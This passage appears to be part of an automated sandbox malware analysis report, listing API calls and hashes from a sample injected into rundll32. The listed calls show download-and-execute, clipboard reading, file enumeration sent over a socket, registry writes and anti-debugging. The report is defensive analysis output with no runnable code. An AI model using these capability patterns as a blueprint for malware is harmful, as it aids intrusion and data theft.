                                      • FindFirstFileW.KERNEL32(00000000,?,02B66608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088CA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02B088F2
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B088FF
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02B08A15
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                      • String ID:
                                      • API String ID: 1771804793-0
                                      • Opcode ID: b32c279ec52ca5176d7cf8c141ffc1b2ba8bf3ccbe7f9fbc6e631dde627880d5
                                      • Instruction ID: c66c7245cfe064e0c35d93e7bc5a0b6a55cbd6656832736b78921cfbd3d42332
                                      • Opcode Fuzzy Hash: b32c279ec52ca5176d7cf8c141ffc1b2ba8bf3ccbe7f9fbc6e631dde627880d5
                                      • Instruction Fuzzy Hash: B3513A72900208AADF0AFB64DD999ED7B7EAF10344F504199A81AA70D1FF349B48CF91
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 02B06FBC
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 02B070A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DownloadExecuteFileShell
                                      • String ID: C:\Windows\SysWOW64\rundll32.exe$open
                                      • API String ID: 2825088817-4147394040
                                      • Opcode ID: 9ff4af691581f039775a4be226e2ed568ffc89cb4b6287794f7131574f4de946
                                      • Instruction ID: 2292cb74f396b28dcdffd3890d8121050dbb7ead3a82a11a0f3649fdf97e5198
                                      • Opcode Fuzzy Hash: 9ff4af691581f039775a4be226e2ed568ffc89cb4b6287794f7131574f4de946
                                      • Instruction Fuzzy Hash: D061B371B043005BDA2AFB78C8D997EBFAB9F80750F4009DCA446571C5EE649949CB92
                                      APIs
                                      • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 02B1CAD7
                                        • Part of subcall function 02B1376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02B1377E
                                        • Part of subcall function 02B1376F: RegSetValueExA.KERNEL32(?,02B674B8,00000000,?,00000000,00000000,02B752F0,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137A6
                                        • Part of subcall function 02B1376F: RegCloseKey.KERNEL32(?,?,?,02B0F853,02B674B8,4.9.4 Pro), ref: 02B137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateInfoParametersSystemValue
                                      • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                      • API String ID: 4127273184-3576401099
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • IsValidCodePage.KERNEL32(00000000), ref: 02B51DBA
                                      • _wcschr.LIBVCRUNTIME ref: 02B51E4A
                                      • _wcschr.LIBVCRUNTIME ref: 02B51E58
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 02B51EFB
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID:
                                      • API String ID: 4212172061-0
                                      APIs
                                      • _free.LIBCMT ref: 02B493BD
                                        • Part of subcall function 02B46782: HeapFree.KERNEL32(00000000,00000000,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?), ref: 02B46798
                                        • Part of subcall function 02B46782: GetLastError.KERNEL32(?,?,02B50C6F,?,00000000,?,00000000,?,02B50F13,?,00000007,?,?,02B5145E,?,?), ref: 02B467AA
                                      • GetTimeZoneInformation.KERNEL32 ref: 02B493CF
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02B72764,000000FF,?,0000003F,?,?), ref: 02B49447
                                      • WideCharToMultiByte.KERNEL32(00000000,?,02B727B8,000000FF,?,0000003F,?,?,?,02B72764,000000FF,?,0000003F,?,?), ref: 02B49474
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                      • String ID:
                                      • API String ID: 806657224-0
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B48274
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52117
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52168
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52228
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                      • String ID:
                                      • API String ID: 2829624132-0
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 02B3BC1A
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02B3BC24
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 02B3BC31
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,02B334BF,00000034,?,?,00000000), ref: 02B33849
                                      • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B33552,00000000,?,00000000), ref: 02B3385F
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,02B33552,00000000,?,00000000,02B1E251), ref: 02B33871
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$AcquireRandomRelease
                                      • String ID:
                                      • API String ID: 1815803762-0
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,02B4328B,?), ref: 02B432D6
                                      • TerminateProcess.KERNEL32(00000000,?,02B4328B,?), ref: 02B432DD
                                      • ExitProcess.KERNEL32 ref: 02B432EF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      APIs
                                      • OpenClipboard.USER32(00000000), ref: 02B0B711
                                      • GetClipboardData.USER32(0000000D), ref: 02B0B71D
                                      • CloseClipboard.USER32 ref: 02B0B725
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Clipboard$CloseDataOpen
                                      • String ID:
                                      • API String ID: 2058664381-0
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,02B444CA,?,00000004), ref: 02B48940
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: GetLocaleInfoEx
                                      • API String ID: 2299586839-2904428671
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?), ref: 02B19D4B
                                      • FindNextFileW.KERNEL32(00000000,?,?), ref: 02B19E17
                                        • Part of subcall function 02B1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02B0A843), ref: 02B1C49E
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Find$CreateFirstNext
                                      • String ID:
                                      • API String ID: 341183262-0
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02B07857
                                      • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02B0791F
                                        • Part of subcall function 02B04AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02B04B36
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNextsend
                                      • String ID:
                                      • API String ID: 4113138495-0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02B11F37,?,?,?,?,?), ref: 02B120E7
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02B120EE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02B53326,?,?,00000008,?,?,02B561DD,00000000), ref: 02B53558
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      APIs
                                      • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 02B34C6B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FeaturePresentProcessor
                                      • String ID:
                                      • API String ID: 2325560087-0
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B48274
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B48281
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 02B52367
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                      • String ID:
                                      • API String ID: 1663032902-0
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • EnumSystemLocalesW.KERNEL32(02B520C3,00000001), ref: 02B5200D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,02B522E1,00000000,00000000,?), ref: 02B5256F
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$InfoLocale_abort_free
                                      • String ID:
                                      • API String ID: 2692324296-0
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • EnumSystemLocalesW.KERNEL32(02B52313,00000001), ref: 02B52082
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      APIs
                                        • Part of subcall function 02B45888: EnterCriticalSection.KERNEL32(-0006D41D,?,02B42FDB,00000000,02B6E928,0000000C,02B42F96,?,?,?,02B45B26,?,?,02B482CA,00000001,00000364), ref: 02B45897
                                      • EnumSystemLocalesW.KERNEL32(Function_000483BE,00000001,02B6EAD0,0000000C), ref: 02B4843C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      • Opcode ID: 224f1e890231d519724172dff5eb722c771958bb243ee035c95dcccc578873e0
                                      • Instruction ID: 5ca712dca6f72aff608f09533f174744ef6fce85206238bcb1645654616f567a
                                      • Opcode Fuzzy Hash: 224f1e890231d519724172dff5eb722c771958bb243ee035c95dcccc578873e0
                                      • Instruction Fuzzy Hash: 5AF0CD72AA0204EFEB10EF78D885B8D37F2EB04361F0089A5F810DB2A1CF7489649F50
                                      APIs
                                        • Part of subcall function 02B48215: GetLastError.KERNEL32(00000020,?,02B3A7F5,?,?,?,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B), ref: 02B48219
                                        • Part of subcall function 02B48215: _free.LIBCMT ref: 02B4824C
                                        • Part of subcall function 02B48215: SetLastError.KERNEL32(00000000,02B3F9A8,?,?,00000020,00000000,?,?,?,02B2DD01,0000003B,?,00000041,00000000,00000000), ref: 02B4828D
                                        • Part of subcall function 02B48215: _abort.LIBCMT ref: 02B48293
                                      • EnumSystemLocalesW.KERNEL32(02B51EA7,00000001), ref: 02B51F87
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      • Opcode ID: 5458c78d506ec17a31e2abc508d6cb95f1c77d858cb28b61b3cd8988c9443bc6
                                      • Instruction ID: f9506f812fc1683dd32921d9f8d35f5c180b67ad9f0f8ab7552411107f0e8954
                                      • Opcode Fuzzy Hash: 5458c78d506ec17a31e2abc508d6cb95f1c77d858cb28b61b3cd8988c9443bc6
                                      • Instruction Fuzzy Hash: 80F0553674031597CB04AF39C848B7A7F91EFC2724B060098EE098F640C7729842CB90
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,02B3487A), ref: 02B34B4C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: f19764307fc03b1f8458bfe2be2c56a2555579664ffe045f6a38b9f903e46b20
                                      • Instruction ID: e01bf7d6e6f9428a331fafe231499a59c862b339cd9ccb112e09cf58a6609cb8
                                      • Opcode Fuzzy Hash: f19764307fc03b1f8458bfe2be2c56a2555579664ffe045f6a38b9f903e46b20
                                      • Instruction Fuzzy Hash:
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 0
                                      • API String ID: 0-4108050209
                                      • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                      • Instruction ID: dcc9bd86c33d59dae43b36e9b4785c5bb44c019b53badc8a613cc9b161b88877
                                      • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                      • Instruction Fuzzy Hash: 63511671600E48A7DF3F89A88C557BE778AEF42248F0809CBD8C2DB681C715E981C752
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                      • Instruction ID: a09cf17d9ce9c5131098651da61d62bda5e69b5d2f884ddbc9360a54ba046cd1
                                      • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                      • Instruction Fuzzy Hash: 9D4136719183458BC340CF29C48020AFBE1FFD8318F649A5EF899A3250D775EA86CB86
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a613c30e5a16bd4d588c7ae19852a1078ad5abf58f91c7035bae8ded5a68252
                                      • Instruction ID: e9cf1fd5249ca6461d1a097514a4371758c9139c69a1bbee74f0778c5516edde
                                      • Opcode Fuzzy Hash: 2a613c30e5a16bd4d588c7ae19852a1078ad5abf58f91c7035bae8ded5a68252
                                      • Instruction Fuzzy Hash: 30324631DA9F114DD7279538D862336A299BFB72C4F15DB27E819B6E96EF28C0C35100
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                      • Instruction ID: 7532ae89351abb7a85814034873b4b7b6fd8ca073b6459591548207a3d63baab
                                      • Opcode Fuzzy Hash: 0a4864b27d88de382483843fe1db909133c688b67c113739af0c1ea374bb11c7
                                      • Instruction Fuzzy Hash: 573215316087459BC729DF28C48077AF7E2FF84318F984AADF8958B691D770E945CB82
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d247a61377a62d72c952db6bc6f9875fc935f9dcc1e367c866125ff8ceeec132
                                      • Instruction ID: 65b643a72b8ecbabee0fb5b719428ca0a041b3b11e59694a53c7b412819e49f0
                                      • Opcode Fuzzy Hash: d247a61377a62d72c952db6bc6f9875fc935f9dcc1e367c866125ff8ceeec132
                                      • Instruction Fuzzy Hash: 5602AE71B546529FC319CF2EE88463AF7E1FB89301708892AE485C7781DB39E536DB90
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e570f92c357284609a980be02019fd99011731b338006111beeb4d8d7cbc26f
                                      • Instruction ID: 9c9d6d3061982764fbc4d5a677f2e70665d44c171f8799a16978acf7c9eebfd9
                                      • Opcode Fuzzy Hash: 7e570f92c357284609a980be02019fd99011731b338006111beeb4d8d7cbc26f
                                      • Instruction Fuzzy Hash: E9F15A75A542559FC304DF19E49487AB3E5FB89341B484E1EF1C2C72C1CB39EA2ACBA1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 93baa37b12ed319c9ed2c15812e22d2447eec932d87a87019142a9f73e1e99f6
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: 59C15FB23051930ADB2E463E957463FFBA19B916B531A07DDE8B2CB1D5EF20D124E620
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: b8823ca1a83798918c1794521dcd6b9a4fb49a61935f537a4d17bdc822115302
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: B0C16F723051930ADB6E463E953463FFBA19B926B531A07ADE8B2CB1D5FF20D124D620
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_2b00000_rundll32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
